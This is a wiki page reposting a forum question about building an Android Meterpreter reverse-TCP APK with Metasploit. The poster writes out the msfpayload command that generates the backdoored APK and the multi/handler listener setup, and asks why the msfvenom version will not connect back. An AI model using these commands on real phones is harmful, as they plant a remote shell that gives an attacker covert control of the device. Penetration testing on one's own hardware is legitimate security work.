MSF: Android/Meterpreter/reverse tcp APK dengan msfvenom

From OnnoWiki
Revision as of 07:59, 15 April 2017 by Onnowpurbo (talk | contribs) (Created page with "sumber: https://null-byte.wonderhowto.com/forum/create-and-use-android-meterpreter-reverse-tcp-apk-with-msfvenom-0162921/ Hi, Metasploit was updated recently (or, at least, s...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

sumber: https://null-byte.wonderhowto.com/forum/create-and-use-android-meterpreter-reverse-tcp-apk-with-msfvenom-0162921/

Hi, Metasploit was updated recently (or, at least, since the last time I used it), and one large thing, is msfpayload was removed, and replaced with msfvenom. I used to be able to just do msfpayload android/meterpreter/reverse_tcp LHOST=ip R > /root/name.apk

Which would create the APK, and then msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST ip exploit To start listening, and it always worked, once the APK was executed on the android device (always my device, btw)

Now, I've tried substituting msfvenom -p for msfpayload, and it creates the APK, but when it is run and the listener is started, it does not connect.

Does anyone know what I'm doing wrong? I can't seem to figure out this new method of things... Thanks! Related 58 Responses 1 Cracker|Hacker Cracker|Hacker 1 year ago - edited 1 year ago

Can you give us screenshots and the full command, please?


Referensi